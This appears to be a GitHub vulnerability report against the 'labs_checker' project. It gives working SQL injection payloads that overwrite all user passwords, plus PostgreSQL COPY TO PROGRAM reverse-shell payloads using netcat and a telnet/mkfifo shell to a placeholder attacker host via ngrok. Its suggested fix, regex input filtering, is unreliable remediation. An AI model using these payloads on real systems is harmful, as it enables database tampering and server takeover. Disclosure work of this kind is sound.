rodionbukhanevych11 / labs_checker Goto Github PK

It is possible for an unauthorised user to develop an sql injection on the login panel via the "Sign Up" functionality using either the "Username" or "Password" fields. We tested your project both locally and using ngrok (which allowed us to expose a local development server to the Internet with minimal effort) by forwarding local ports to public ones.

FOUND: @l1asis and @Summitvc

PROBLEMTYPE: SQL Injection

STEPS TO REPRODUCE:

1. Set up the postgresql database and run the application by running Backend/UI scripts
2. Try to create a user with a normal username and password
3. Enter the random (previously unused) username in the username field
4. In the password field, enter:

'); UPDATE users SET password='injected' WHERE 1=1; --

5. Press the Sign Up button and check the database for changes using a comfortable terminal. The passwords of all users will be changed to injected. It is also possible to execute any other PostgreSQL command (e.g. delete all entries from the users table).

HOW TO MITIGATE:

Implement simple user input sanitisation. For example, use the re Python library, catch illegal symbols in the string (whitespaces, commas, etc.).

PROBLEMTYPE: RCE (Remote Code Execution) evolved into reverse shell

STEPS TO REPRODUCE USING LOCAL MACHINE:

1. Set up the application.
2. Set up the netcat listener on your local machine:

sudo nc -lvnp 4444

4. Enter the random (previously unused) username in the username field on the login page.
5. In the password field enter:

'); copy (SELECT '') to program 'nc -c sh 127.0.0.1 4444'-- -

6. This will get you an incoming connection and provide you with a remote shell command line interpreter.

STEPS TO REPRODUCE USING TWO MACHINES:

1. Configure ngrok on both the attacking and victim machines:

ngrok config add-authtoken <TOKEN>

2. Run the application on the local address (by default) and then bring your application online by running (three separate terminal windows):

ngrok http <UI_OR_BACK_PORT>

3. Set up the listener on the attacker's machine:

sudo nc -lvnp 4444

4. Put your listener online (another terminal window):

ngrok tcp 4444

5. Enter the random username in the username field and then the following in the password field

'); copy (SELECT '') to program 'TF=$(mktemp -u);mkfifo $TF && telnet <ADDRESS_ATTACKER> <PORT_ATTACKER> 0<$TF | sh 1>$TF'-- -

P.S. <ADDRESS_ATTACKER> should look like this: 5.tcp.eu.ngrok.io

HOW TO MITIGATE: User input sanitisation.

References:

• A03:2021 – Injection TOP 10 OWASP
• PentestMonkeys PostgreSQL Cheatsheet

File image.png is not provided.